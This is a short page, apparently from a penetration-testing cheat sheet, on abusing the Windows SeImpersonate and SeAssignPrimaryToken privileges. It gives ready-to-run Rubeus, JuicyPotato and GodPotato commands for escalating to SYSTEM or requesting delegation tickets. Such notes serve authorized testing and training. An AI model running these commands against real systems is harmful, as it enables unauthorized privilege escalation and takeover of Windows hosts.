search

User Privileges

hashtag
SeImpersonate and SeAssignPrimaryToken

These privileges allow you to immediately escalate to NT AUTHORITY\SYSTEM through "potato" attacks by stealing authentication and using it to impersonate a privileged process token. However, you may also perform a delegation TGT request as the network service account and perform S4U2self abuse:

Rubeus.exe tgtdeleg /nowrap

If you're running on an older OS, try using the classic JuicyPotato:

.\JuicyPotato.exe -l 1337 -p C:\windows\tasks\win.exe -t *

If you're working with anything reasonably modern, try using GodPotato:

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

PreviousDomain and Local GroupsNextInitial Access

Last updated